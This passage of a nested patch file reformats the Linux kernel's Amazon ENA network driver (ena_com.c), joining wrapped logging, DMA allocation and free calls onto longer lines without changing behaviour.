+-		dma_free_coherent(ena_dev->dmadev, size,
+-				  io_sq->desc_addr.virt_addr,
++		dma_free_coherent(ena_dev->dmadev, size, io_sq->desc_addr.virt_addr,
+ 				  io_sq->desc_addr.phys_addr);
+ 
+ 		io_sq->desc_addr.virt_addr = NULL;
+@@ -985,8 +946,7 @@ static int wait_for_reset_state(struct ena_com_dev *ena_dev, u32 timeout,
+ 		val = ena_com_reg_bar_read32(ena_dev, ENA_REGS_DEV_STS_OFF);
+ 
+ 		if (unlikely(val == ENA_MMIO_READ_TIMEOUT)) {
+-			netdev_err(ena_dev->net_device,
+-				   "Reg read timeout occurred\n");
++			netdev_err(ena_dev->net_device, "Reg read timeout occurred\n");
+ 			return -ETIME;
+ 		}
+ 
+@@ -1026,8 +986,7 @@ static int ena_com_get_feature_ex(struct ena_com_dev *ena_dev,
+ 	int ret;
+ 
+ 	if (!ena_com_check_supported_feature_id(ena_dev, feature_id)) {
+-		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+-			   feature_id);
++		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n", feature_id);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+@@ -1064,8 +1023,7 @@ static int ena_com_get_feature_ex(struct ena_com_dev *ena_dev,
+ 
+ 	if (unlikely(ret))
+ 		netdev_err(ena_dev->net_device,
+-			   "Failed to submit get_feature command %d error: %d\n",
+-			   feature_id, ret);
++			   "Failed to submit get_feature command %d error: %d\n", feature_id, ret);
+ 
+ 	return ret;
+ }
+@@ -1104,13 +1062,11 @@ static int ena_com_hash_key_allocate(struct ena_com_dev *ena_dev)
+ {
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+-	if (!ena_com_check_supported_feature_id(ena_dev,
+-						ENA_ADMIN_RSS_HASH_FUNCTION))
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_HASH_FUNCTION))
+ 		return -EOPNOTSUPP;
+ 
+-	rss->hash_key =
+-		dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_key),
+-				   &rss->hash_key_dma_addr, GFP_KERNEL);
++	rss->hash_key = dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_key),
++					   &rss->hash_key_dma_addr, GFP_KERNEL);
+ 
+ 	if (unlikely(!rss->hash_key))
+ 		return -ENOMEM;
+@@ -1123,8 +1079,8 @@ static void ena_com_hash_key_destroy(struct ena_com_dev *ena_dev)
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+ 	if (rss->hash_key)
+-		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_key),
+-				  rss->hash_key, rss->hash_key_dma_addr);
++		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_key), rss->hash_key,
++				  rss->hash_key_dma_addr);
+ 	rss->hash_key = NULL;
+ }
+ 
+@@ -1132,9 +1088,8 @@ static int ena_com_hash_ctrl_init(struct ena_com_dev *ena_dev)
+ {
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+-	rss->hash_ctrl =
+-		dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl),
+-				   &rss->hash_ctrl_dma_addr, GFP_KERNEL);
++	rss->hash_ctrl = dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl),
++					    &rss->hash_ctrl_dma_addr, GFP_KERNEL);
+ 
+ 	if (unlikely(!rss->hash_ctrl))
+ 		return -ENOMEM;
+@@ -1147,8 +1102,8 @@ static void ena_com_hash_ctrl_destroy(struct ena_com_dev *ena_dev)
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+ 	if (rss->hash_ctrl)
+-		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl),
+-				  rss->hash_ctrl, rss->hash_ctrl_dma_addr);
++		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl), rss->hash_ctrl,
++				  rss->hash_ctrl_dma_addr);
+ 	rss->hash_ctrl = NULL;
+ }
+ 
+@@ -1177,15 +1132,13 @@ static int ena_com_indirect_table_allocate(struct ena_com_dev *ena_dev,
+ 	tbl_size = (1ULL << log_size) *
+ 		sizeof(struct ena_admin_rss_ind_table_entry);
+ 
+-	rss->rss_ind_tbl =
+-		dma_alloc_coherent(ena_dev->dmadev, tbl_size,
+-				   &rss->rss_ind_tbl_dma_addr, GFP_KERNEL);
++	rss->rss_ind_tbl = dma_alloc_coherent(ena_dev->dmadev, tbl_size, &rss->rss_ind_tbl_dma_addr,
++					      GFP_KERNEL);
+ 	if (unlikely(!rss->rss_ind_tbl))
+ 		goto mem_err1;
+ 
+ 	tbl_size = (1ULL << log_size) * sizeof(u16);
+-	rss->host_rss_ind_tbl =
+-		devm_kzalloc(ena_dev->dmadev, tbl_size, GFP_KERNEL);
++	rss->host_rss_ind_tbl = devm_kzalloc(ena_dev->dmadev, tbl_size, GFP_KERNEL);
+ 	if (unlikely(!rss->host_rss_ind_tbl))
+ 		goto mem_err2;
+ 
+@@ -1197,8 +1150,7 @@ static int ena_com_indirect_table_allocate(struct ena_com_dev *ena_dev,
+ 	tbl_size = (1ULL << log_size) *
+ 		sizeof(struct ena_admin_rss_ind_table_entry);
+ 
+-	dma_free_coherent(ena_dev->dmadev, tbl_size, rss->rss_ind_tbl,
+-			  rss->rss_ind_tbl_dma_addr);
++	dma_free_coherent(ena_dev->dmadev, tbl_size, rss->rss_ind_tbl, rss->rss_ind_tbl_dma_addr);
+ 	rss->rss_ind_tbl = NULL;
+ mem_err1:
+ 	rss->tbl_log_size = 0;
+@@ -1261,8 +1213,7 @@ static int ena_com_create_io_sq(struct ena_com_dev *ena_dev,
+ 					   &create_cmd.sq_ba,
+ 					   io_sq->desc_addr.phys_addr);
+ 		if (unlikely(ret)) {
+-			netdev_err(ena_dev->net_device,
+-				   "Memory address set failed\n");
++			netdev_err(ena_dev->net_device, "Memory address set failed\n");
+ 			return ret;
+ 		}
+ 	}
+@@ -1273,8 +1224,7 @@ static int ena_com_create_io_sq(struct ena_com_dev *ena_dev,
+ 					    (struct ena_admin_acq_entry *)&cmd_completion,
+ 					    sizeof(cmd_completion));
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to create IO SQ. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to create IO SQ. error: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -1292,8 +1242,7 @@ static int ena_com_create_io_sq(struct ena_com_dev *ena_dev,
+ 			cmd_completion.llq_descriptors_offset);
+ 	}
+ 
+-	netdev_dbg(ena_dev->net_device, "Created sq[%u], depth[%u]\n",
+-		   io_sq->idx, io_sq->q_depth);
++	netdev_dbg(ena_dev->net_device, "Created sq[%u], depth[%u]\n", io_sq->idx, io_sq->q_depth);
+ 
+ 	return ret;
+ }
+@@ -1420,8 +1369,7 @@ int ena_com_create_io_cq(struct ena_com_dev *ena_dev,
+ 					    (struct ena_admin_acq_entry *)&cmd_completion,
+ 					    sizeof(cmd_completion));
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to create IO CQ. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to create IO CQ. error: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -1440,8 +1388,7 @@ int ena_com_create_io_cq(struct ena_com_dev *ena_dev,
+ 			(u32 __iomem *)((uintptr_t)ena_dev->reg_bar +
+ 			cmd_completion.numa_node_register_offset);
+ 
+-	netdev_dbg(ena_dev->net_device, "Created cq[%u], depth[%u]\n",
+-		   io_cq->idx, io_cq->q_depth);
++	netdev_dbg(ena_dev->net_device, "Created cq[%u], depth[%u]\n", io_cq->idx, io_cq->q_depth);
+ 
+ 	return ret;
+ }
+@@ -1451,8 +1398,7 @@ int ena_com_get_io_handlers(struct ena_com_dev *ena_dev, u16 qid,
+ 			    struct ena_com_io_cq **io_cq)
+ {
+ 	if (qid >= ENA_TOTAL_NUM_QUEUES) {
+-		netdev_err(ena_dev->net_device,
+-			   "Invalid queue number %d but the max is %d\n", qid,
++		netdev_err(ena_dev->net_device, "Invalid queue number %d but the max is %d\n", qid,
+ 			   ENA_TOTAL_NUM_QUEUES);
+ 		return -EINVAL;
+ 	}
+@@ -1492,8 +1438,7 @@ void ena_com_wait_for_abort_completion(struct ena_com_dev *ena_dev)
+ 	spin_lock_irqsave(&admin_queue->q_lock, flags);
+ 	while (atomic_read(&admin_queue->outstanding_cmds) != 0) {
+ 		spin_unlock_irqrestore(&admin_queue->q_lock, flags);
+-		ena_delay_exponential_backoff_us(exp++,
+-						 ena_dev->ena_min_poll_delay_us);
++		ena_delay_exponential_backoff_us(exp++, ena_dev->ena_min_poll_delay_us);
+ 		spin_lock_irqsave(&admin_queue->q_lock, flags);
+ 	}
+ 	spin_unlock_irqrestore(&admin_queue->q_lock, flags);
+@@ -1519,8 +1464,7 @@ int ena_com_destroy_io_cq(struct ena_com_dev *ena_dev,
+ 					    sizeof(destroy_resp));
+ 
+ 	if (unlikely(ret && (ret != -ENODEV)))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to destroy IO CQ. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to destroy IO CQ. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -1588,8 +1532,7 @@ int ena_com_set_aenq_config(struct ena_com_dev *ena_dev, u32 groups_flag)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to config AENQ ret: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to config AENQ ret: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -1610,8 +1553,7 @@ int ena_com_get_dma_width(struct ena_com_dev *ena_dev)
+ 	netdev_dbg(ena_dev->net_device, "ENA dma width: %d\n", width);
+ 
+ 	if ((width < 32) || width > ENA_MAX_PHYS_ADDR_SIZE_BITS) {
+-		netdev_err(ena_dev->net_device, "DMA width illegal value: %d\n",
+-			   width);
++		netdev_err(ena_dev->net_device, "DMA width illegal value: %d\n", width);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -1633,19 +1575,16 @@ int ena_com_validate_version(struct ena_com_dev *ena_dev)
+ 	ctrl_ver = ena_com_reg_bar_read32(ena_dev,
+ 					  ENA_REGS_CONTROLLER_VERSION_OFF);
+ 
+-	if (unlikely((ver == ENA_MMIO_READ_TIMEOUT) ||
+-		     (ctrl_ver == ENA_MMIO_READ_TIMEOUT))) {
++	if (unlikely((ver == ENA_MMIO_READ_TIMEOUT) || (ctrl_ver == ENA_MMIO_READ_TIMEOUT))) {
+ 		netdev_err(ena_dev->net_device, "Reg read timeout occurred\n");
+ 		return -ETIME;
+ 	}
+ 
+ 	dev_info(ena_dev->dmadev, "ENA device version: %d.%d\n",
+-		 (ver & ENA_REGS_VERSION_MAJOR_VERSION_MASK) >>
+-			 ENA_REGS_VERSION_MAJOR_VERSION_SHIFT,
++		 (ver & ENA_REGS_VERSION_MAJOR_VERSION_MASK) >> ENA_REGS_VERSION_MAJOR_VERSION_SHIFT,
+ 		 ver & ENA_REGS_VERSION_MINOR_VERSION_MASK);
+ 
+-	dev_info(ena_dev->dmadev,
+-		 "ENA controller version: %d.%d.%d implementation version %d\n",
++	dev_info(ena_dev->dmadev, "ENA controller version: %d.%d.%d implementation version %d\n",
+ 		 (ctrl_ver & ENA_REGS_CONTROLLER_VERSION_MAJOR_VERSION_MASK) >>
+ 			 ENA_REGS_CONTROLLER_VERSION_MAJOR_VERSION_SHIFT,
+ 		 (ctrl_ver & ENA_REGS_CONTROLLER_VERSION_MINOR_VERSION_MASK) >>
+@@ -1694,20 +1633,17 @@ void ena_com_admin_destroy(struct ena_com_dev *ena_dev)
+ 
+ 	size = ADMIN_SQ_SIZE(admin_queue->q_depth);
+ 	if (sq->entries)
+-		dma_free_coherent(ena_dev->dmadev, size, sq->entries,
+-				  sq->dma_addr);
++		dma_free_coherent(ena_dev->dmadev, size, sq->entries, sq->dma_addr);
+ 	sq->entries = NULL;
+ 
+ 	size = ADMIN_CQ_SIZE(admin_queue->q_depth);
+ 	if (cq->entries)
+-		dma_free_coherent(ena_dev->dmadev, size, cq->entries,
+-				  cq->dma_addr);
++		dma_free_coherent(ena_dev->dmadev, size, cq->entries, cq->dma_addr);
+ 	cq->entries = NULL;
+ 
+ 	size = ADMIN_AENQ_SIZE(aenq->q_depth);
+ 	if (ena_dev->aenq.entries)
+-		dma_free_coherent(ena_dev->dmadev, size, aenq->entries,
+-				  aenq->dma_addr);
++		dma_free_coherent(ena_dev->dmadev, size, aenq->entries, aenq->dma_addr);
+ 	aenq->entries = NULL;
+ }
+ 
+@@ -1733,10 +1669,8 @@ int ena_com_mmio_reg_read_request_init(struct ena_com_dev *ena_dev)
+ 	struct ena_com_mmio_read *mmio_read = &ena_dev->mmio_read;
+ 
+ 	spin_lock_init(&mmio_read->lock);
+-	mmio_read->read_resp =
+-		dma_alloc_coherent(ena_dev->dmadev,
+-				   sizeof(*mmio_read->read_resp),
+-				   &mmio_read->read_resp_dma_addr, GFP_KERNEL);
++	mmio_read->read_resp = dma_alloc_coherent(ena_dev->dmadev, sizeof(*mmio_read->read_resp),
++						  &mmio_read->read_resp_dma_addr, GFP_KERNEL);
+ 	if (unlikely(!mmio_read->read_resp))
+ 		goto err;
+ 
+@@ -1767,8 +1701,8 @@ void ena_com_mmio_reg_read_request_destroy(struct ena_com_dev *ena_dev)
+ 	writel(0x0, ena_dev->reg_bar + ENA_REGS_MMIO_RESP_LO_OFF);
+ 	writel(0x0, ena_dev->reg_bar + ENA_REGS_MMIO_RESP_HI_OFF);
+ 
+-	dma_free_coherent(ena_dev->dmadev, sizeof(*mmio_read->read_resp),
+-			  mmio_read->read_resp, mmio_read->read_resp_dma_addr);
++	dma_free_coherent(ena_dev->dmadev, sizeof(*mmio_read->read_resp), mmio_read->read_resp,
++			  mmio_read->read_resp_dma_addr);
+ 
+ 	mmio_read->read_resp = NULL;
+ }
+@@ -1800,8 +1734,7 @@ int ena_com_admin_init(struct ena_com_dev *ena_dev,
+ 	}
+ 
+ 	if (!(dev_sts & ENA_REGS_DEV_STS_READY_MASK)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Device isn't ready, abort com init\n");
++		netdev_err(ena_dev->net_device, "Device isn't ready, abort com init\n");
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1878,8 +1811,7 @@ int ena_com_create_io_queue(struct ena_com_dev *ena_dev,
+ 	int ret;
+ 
+ 	if (ctx->qid >= ENA_TOTAL_NUM_QUEUES) {
+-		netdev_err(ena_dev->net_device,
+-			   "Qid (%d) is bigger than max num of queues (%d)\n",
++		netdev_err(ena_dev->net_device, "Qid (%d) is bigger than max num of queues (%d)\n",
+ 			   ctx->qid, ENA_TOTAL_NUM_QUEUES);
+ 		return -EINVAL;
+ 	}
+@@ -1905,8 +1837,7 @@ int ena_com_create_io_queue(struct ena_com_dev *ena_dev,
+ 
+ 	if (ctx->direction == ENA_COM_IO_QUEUE_DIRECTION_TX)
+ 		/* header length is limited to 8 bits */
+-		io_sq->tx_max_header_size =
+-			min_t(u32, ena_dev->tx_max_header_size, SZ_256);
++		io_sq->tx_max_header_size = min_t(u32, ena_dev->tx_max_header_size, SZ_256);
+ 
+ 	ret = ena_com_init_io_sq(ena_dev, ctx, io_sq);
+ 	if (ret)
+@@ -1938,8 +1869,7 @@ void ena_com_destroy_io_queue(struct ena_com_dev *ena_dev, u16 qid)
+ 	struct ena_com_io_cq *io_cq;
+ 
+ 	if (qid >= ENA_TOTAL_NUM_QUEUES) {
+-		netdev_err(ena_dev->net_device,
+-			   "Qid (%d) is bigger than max num of queues (%d)\n",
++		netdev_err(ena_dev->net_device, "Qid (%d) is bigger than max num of queues (%d)\n",
+ 			   qid, ENA_TOTAL_NUM_QUEUES);
+ 		return;
+ 	}
+@@ -1983,8 +1913,7 @@ int ena_com_get_dev_attr_feat(struct ena_com_dev *ena_dev,
+ 		if (rc)
+ 			return rc;
+ 
+-		if (get_resp.u.max_queue_ext.version !=
+-		    ENA_FEATURE_MAX_QUEUE_EXT_VER)
++		if (get_resp.u.max_queue_ext.version != ENA_FEATURE_MAX_QUEUE_EXT_VER)
+ 			return -EINVAL;
+ 
+ 		memcpy(&get_feat_ctx->max_queue_ext, &get_resp.u.max_queue_ext,
+@@ -2025,18 +1954,15 @@ int ena_com_get_dev_attr_feat(struct ena_com_dev *ena_dev,
+ 	rc = ena_com_get_feature(ena_dev, &get_resp, ENA_ADMIN_HW_HINTS, 0);
+ 
+ 	if (!rc)
+-		memcpy(&get_feat_ctx->hw_hints, &get_resp.u.hw_hints,
+-		       sizeof(get_resp.u.hw_hints));
++		memcpy(&get_feat_ctx->hw_hints, &get_resp.u.hw_hints, sizeof(get_resp.u.hw_hints));
+ 	else if (rc == -EOPNOTSUPP)
+-		memset(&get_feat_ctx->hw_hints, 0x0,
+-		       sizeof(get_feat_ctx->hw_hints));
++		memset(&get_feat_ctx->hw_hints, 0x0, sizeof(get_feat_ctx->hw_hints));
+ 	else
+ 		return rc;
+ 
+ 	rc = ena_com_get_feature(ena_dev, &get_resp, ENA_ADMIN_LLQ, 0);
+ 	if (!rc)
+-		memcpy(&get_feat_ctx->llq, &get_resp.u.llq,
+-		       sizeof(get_resp.u.llq));
++		memcpy(&get_feat_ctx->llq, &get_resp.u.llq, sizeof(get_resp.u.llq));
+ 	else if (rc == -EOPNOTSUPP)
+ 		memset(&get_feat_ctx->llq, 0x0, sizeof(get_feat_ctx->llq));
+ 	else
+@@ -2084,8 +2010,7 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *ena_dev, void *data)
+ 	aenq_common = &aenq_e->aenq_common_desc;
+ 
+ 	/* Go over all the events */
+-	while ((READ_ONCE(aenq_common->flags) &
+-		ENA_ADMIN_AENQ_COMMON_DESC_PHASE_MASK) == phase) {
++	while ((READ_ONCE(aenq_common->flags) & ENA_ADMIN_AENQ_COMMON_DESC_PHASE_MASK) == phase) {
+ 		/* Make sure the phase bit (ownership) is as expected before
+ 		 * reading the rest of the descriptor.
+ 		 */
+@@ -2094,8 +2019,7 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *ena_dev, void *data)
+ 		timestamp = (u64)aenq_common->timestamp_low |
+ 			((u64)aenq_common->timestamp_high << 32);
+ 
+-		netdev_dbg(ena_dev->net_device,
+-			   "AENQ! Group[%x] Syndrome[%x] timestamp: [%llus]\n",
++		netdev_dbg(ena_dev->net_device, "AENQ! Group[%x] Syndrome[%x] timestamp: [%llus]\n",
+ 			   aenq_common->group, aenq_common->syndrome, timestamp);
+ 
+ 		/* Handle specific event*/
+@@ -2124,8 +2048,7 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *ena_dev, void *data)
+ 
+ 	/* write the aenq doorbell after all AENQ descriptors were read */
+ 	mb();
+-	writel_relaxed((u32)aenq->head,
+-		       ena_dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
++	writel_relaxed((u32)aenq->head, ena_dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
+ }
+ 
+ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+@@ -2137,15 +2060,13 @@ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+ 	stat = ena_com_reg_bar_read32(ena_dev, ENA_REGS_DEV_STS_OFF);
+ 	cap = ena_com_reg_bar_read32(ena_dev, ENA_REGS_CAPS_OFF);
+ 
+-	if (unlikely((stat == ENA_MMIO_READ_TIMEOUT) ||
+-		     (cap == ENA_MMIO_READ_TIMEOUT))) {
++	if (unlikely((stat == ENA_MMIO_READ_TIMEOUT) || (cap == ENA_MMIO_READ_TIMEOUT))) {
+ 		netdev_err(ena_dev->net_device, "Reg read32 timeout occurred\n");
+ 		return -ETIME;
+ 	}
+ 
+ 	if ((stat & ENA_REGS_DEV_STS_READY_MASK) == 0) {
+-		netdev_err(ena_dev->net_device,
+-			   "Device isn't ready, can't reset device\n");
++		netdev_err(ena_dev->net_device, "Device isn't ready, can't reset device\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -2168,8 +2089,7 @@ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+ 	rc = wait_for_reset_state(ena_dev, timeout,
+ 				  ENA_REGS_DEV_STS_RESET_IN_PROGRESS_MASK);
+ 	if (rc != 0) {
+-		netdev_err(ena_dev->net_device,
+-			   "Reset indication didn't turn on\n");
++		netdev_err(ena_dev->net_device, "Reset indication didn't turn on\n");
+ 		return rc;
+ 	}
+ 
+@@ -2177,8 +2097,7 @@ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+ 	writel(0, ena_dev->reg_bar + ENA_REGS_DEV_CTL_OFF);
+ 	rc = wait_for_reset_state(ena_dev, timeout, 0);
+ 	if (rc != 0) {
+-		netdev_err(ena_dev->net_device,
+-			   "Reset indication didn't turn off\n");
++		netdev_err(ena_dev->net_device, "Reset indication didn't turn off\n");
+ 		return rc;
+ 	}
+ 
+@@ -2215,8 +2134,7 @@ static int ena_get_dev_stats(struct ena_com_dev *ena_dev,
+ 					     sizeof(*get_resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to get stats. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to get stats. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2228,8 +2146,7 @@ int ena_com_get_eni_stats(struct ena_com_dev *ena_dev,
+ 	int ret;
+ 
+ 	if (!ena_com_get_cap(ena_dev, ENA_ADMIN_ENI_STATS)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Capability %d isn't supported\n",
++		netdev_err(ena_dev->net_device, "Capability %d isn't supported\n",
+ 			   ENA_ADMIN_ENI_STATS);
+ 		return -EOPNOTSUPP;
+ 	}
+@@ -2266,8 +2183,7 @@ int ena_com_set_dev_mtu(struct ena_com_dev *ena_dev, u32 mtu)
+ 	int ret;
+ 
+ 	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_MTU)) {
+-		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+-			   ENA_ADMIN_MTU);
++		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n", ENA_ADMIN_MTU);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+@@ -2286,8 +2202,7 @@ int ena_com_set_dev_mtu(struct ena_com_dev *ena_dev, u32 mtu)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set mtu %d. error: %d\n", mtu, ret);
++		netdev_err(ena_dev->net_device, "Failed to set mtu %d. error: %d\n", mtu, ret);
+ 
+ 	return ret;
+ }
+@@ -2301,8 +2216,7 @@ int ena_com_get_offload_settings(struct ena_com_dev *ena_dev,
+ 	ret = ena_com_get_feature(ena_dev, &resp,
+ 				  ENA_ADMIN_STATELESS_OFFLOAD_CONFIG, 0);
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to get offload capabilities %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to get offload capabilities %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -2320,8 +2234,7 @@ int ena_com_set_hash_function(struct ena_com_dev *ena_dev)
+ 	struct ena_admin_get_feat_resp get_resp;
+ 	int ret;
+ 
+-	if (!ena_com_check_supported_feature_id(ena_dev,
+-						ENA_ADMIN_RSS_HASH_FUNCTION)) {
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_HASH_FUNCTION)) {
+ 		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 			   ENA_ADMIN_RSS_HASH_FUNCTION);
+ 		return -EOPNOTSUPP;
+@@ -2334,8 +2247,7 @@ int ena_com_set_hash_function(struct ena_com_dev *ena_dev)
+ 		return ret;
+ 
+ 	if (!(get_resp.u.flow_hash_func.supported_func & BIT(rss->hash_func))) {
+-		netdev_err(ena_dev->net_device,
+-			   "Func hash %d isn't supported by device, abort\n",
++		netdev_err(ena_dev->net_device, "Func hash %d isn't supported by device, abort\n",
+ 			   rss->hash_func);
+ 		return -EOPNOTSUPP;
+ 	}
+@@ -2365,8 +2277,7 @@ int ena_com_set_hash_function(struct ena_com_dev *ena_dev)
+ 					    (struct ena_admin_acq_entry *)&resp,
+ 					    sizeof(resp));
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set hash function %d. error: %d\n",
++		netdev_err(ena_dev->net_device, "Failed to set hash function %d. error: %d\n",
+ 			   rss->hash_func, ret);
+ 		return -EINVAL;
+ 	}
+@@ -2398,16 +2309,15 @@ int ena_com_fill_hash_function(struct ena_com_dev *ena_dev,
+ 		return rc;
+ 
+ 	if (!(BIT(func) & get_resp.u.flow_hash_func.supported_func)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Flow hash function %d isn't supported\n", func);
++		netdev_err(ena_dev->net_device, "Flow hash function %d isn't supported\n", func);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+ 	if ((func == ENA_ADMIN_TOEPLITZ) && key) {
+ 		if (key_len != sizeof(hash_key->key)) {
+ 			netdev_err(ena_dev->net_device,
+-				   "key len (%u) doesn't equal the supported size (%zu)\n",
+-				   key_len, sizeof(hash_key->key));
++				   "key len (%u) doesn't equal the supported size (%zu)\n", key_len,
++				   sizeof(hash_key->key));
+ 			return -EINVAL;
+ 		}
+ 		memcpy(hash_key->key, key, key_len);
+@@ -2495,8 +2405,7 @@ int ena_com_set_hash_ctrl(struct ena_com_dev *ena_dev)
+ 	struct ena_admin_set_feat_resp resp;
+ 	int ret;
+ 
+-	if (!ena_com_check_supported_feature_id(ena_dev,
+-						ENA_ADMIN_RSS_HASH_INPUT)) {
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_HASH_INPUT)) {
+ 		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 			   ENA_ADMIN_RSS_HASH_INPUT);
+ 		return -EOPNOTSUPP;
+@@ -2527,8 +2436,7 @@ int ena_com_set_hash_ctrl(struct ena_com_dev *ena_dev)
+ 					    (struct ena_admin_acq_entry *)&resp,
+ 					    sizeof(resp));
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set hash input. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set hash input. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2605,8 +2513,7 @@ int ena_com_fill_hash_ctrl(struct ena_com_dev *ena_dev,
+ 	int rc;
+ 
+ 	if (proto >= ENA_ADMIN_RSS_PROTO_NUM) {
+-		netdev_err(ena_dev->net_device, "Invalid proto num (%u)\n",
+-			   proto);
++		netdev_err(ena_dev->net_device, "Invalid proto num (%u)\n", proto);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -2658,8 +2565,7 @@ int ena_com_indirect_table_set(struct ena_com_dev *ena_dev)
+ 	struct ena_admin_set_feat_resp resp;
+ 	int ret;
+ 
+-	if (!ena_com_check_supported_feature_id(
+-		    ena_dev, ENA_ADMIN_RSS_INDIRECTION_TABLE_CONFIG)) {
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_INDIRECTION_TABLE_CONFIG)) {
+ 		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 			   ENA_ADMIN_RSS_INDIRECTION_TABLE_CONFIG);
+ 		return -EOPNOTSUPP;
+@@ -2699,8 +2605,7 @@ int ena_com_indirect_table_set(struct ena_com_dev *ena_dev)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set indirect table. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set indirect table. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2779,9 +2684,8 @@ int ena_com_allocate_host_info(struct ena_com_dev *ena_dev)
+ {
+ 	struct ena_host_attribute *host_attr = &ena_dev->host_attr;
+ 
+-	host_attr->host_info =
+-		dma_alloc_coherent(ena_dev->dmadev, SZ_4K,
+-				   &host_attr->host_info_dma_addr, GFP_KERNEL);
++	host_attr->host_info = dma_alloc_coherent(ena_dev->dmadev, SZ_4K,
++						  &host_attr->host_info_dma_addr, GFP_KERNEL);
+ 	if (unlikely(!host_attr->host_info))
+ 		return -ENOMEM;
+ 
+@@ -2827,8 +2731,7 @@ void ena_com_delete_debug_area(struct ena_com_dev *ena_dev)
+ 
+ 	if (host_attr->debug_area_virt_addr) {
+ 		dma_free_coherent(ena_dev->dmadev, host_attr->debug_area_size,
+-				  host_attr->debug_area_virt_addr,
+-				  host_attr->debug_area_dma_addr);
++				  host_attr->debug_area_virt_addr, host_attr->debug_area_dma_addr);
+ 		host_attr->debug_area_virt_addr = NULL;
+ 	}
+ }
+@@ -2877,8 +2780,7 @@ int ena_com_set_host_attributes(struct ena_com_dev *ena_dev)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set host attributes: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set host attributes: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2896,8 +2798,7 @@ static int ena_com_update_nonadaptive_moderation_interval(struct ena_com_dev *en
+ 							  u32 *intr_moder_interval)
+ {
+ 	if (!intr_delay_resolution) {
+-		netdev_err(ena_dev->net_device,
+-			   "Illegal interrupt delay granularity value\n");
++		netdev_err(ena_dev->net_device, "Illegal interrupt delay granularity value\n");
+ 		return -EFAULT;
+ 	}
+ 
+@@ -2935,14 +2836,12 @@ int ena_com_init_interrupt_moderation(struct ena_com_dev *ena_dev)
